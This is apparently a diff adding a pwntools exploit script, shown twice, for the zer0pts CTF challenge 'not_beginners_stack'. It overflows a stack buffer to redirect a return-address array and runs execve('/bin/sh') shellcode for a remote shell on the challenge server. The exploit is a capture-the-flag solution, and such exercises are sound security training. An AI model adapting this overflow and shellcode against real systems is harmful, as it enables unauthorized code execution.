farazsth98 · March 7, 2021 12:04
diff --git a/not_beginners_stack.py b/not_beginners_stack.py
 #!/usr/bin/env python3

 from pwn import *

 #p = process("./chall")
 p = remote("pwn.ctf.zer0pts.com", 9011)

 #gdb.attach(p)

 # Overwrite rbp with return address array + some offset
 p.sendafter("Data: ", b"A"*0x100 + p64(0x600234+0xd0)[:6])

 # Now we send shellcode + /bin/sh string, it will be stored at rbp-100
 shellcode = b"\x48\xC7\xC7\x04\x02\x60\x00\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
 shellcode = b"/bin/sh\x00" + shellcode

 # Pad to return address array
 payload = shellcode + b"AA"
 payload += b"A"*8 

 # Right before the return address array, there is an index variable. set this
 # to 2, it will be set to 1 before accessing the array
 payload += b"\x00\x00\x02\x00\x00\x00\x00\x00"

 # Pad more to array
 payload += b"B"*8

 # Overwrite array index 1 with our shellcode's address
 payload += p64(0x600204+8)

 # Sice
 p.sendafter("Data: ", payload)

 p.interactive()
	#!/usr/bin/env python3

	from pwn import *

	#p = process("./chall")
	p = remote("pwn.ctf.zer0pts.com", 9011)

	#gdb.attach(p)

	# Overwrite rbp with return address array + some offset
	p.sendafter("Data: ", b"A"*0x100 + p64(0x600234+0xd0)[:6])

	# Now we send shellcode + /bin/sh string, it will be stored at rbp-100
	shellcode = b"\x48\xC7\xC7\x04\x02\x60\x00\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
	shellcode = b"/bin/sh\x00" + shellcode

	# Pad to return address array
	payload = shellcode + b"AA"
	payload += b"A"*8

	# Right before the return address array, there is an index variable. set this
	# to 2, it will be set to 1 before accessing the array
	payload += b"\x00\x00\x02\x00\x00\x00\x00\x00"

	# Pad more to array
	payload += b"B"*8

	# Overwrite array index 1 with our shellcode's address
	payload += p64(0x600204+8)

	# Sice
	p.sendafter("Data: ", payload)

	p.interactive()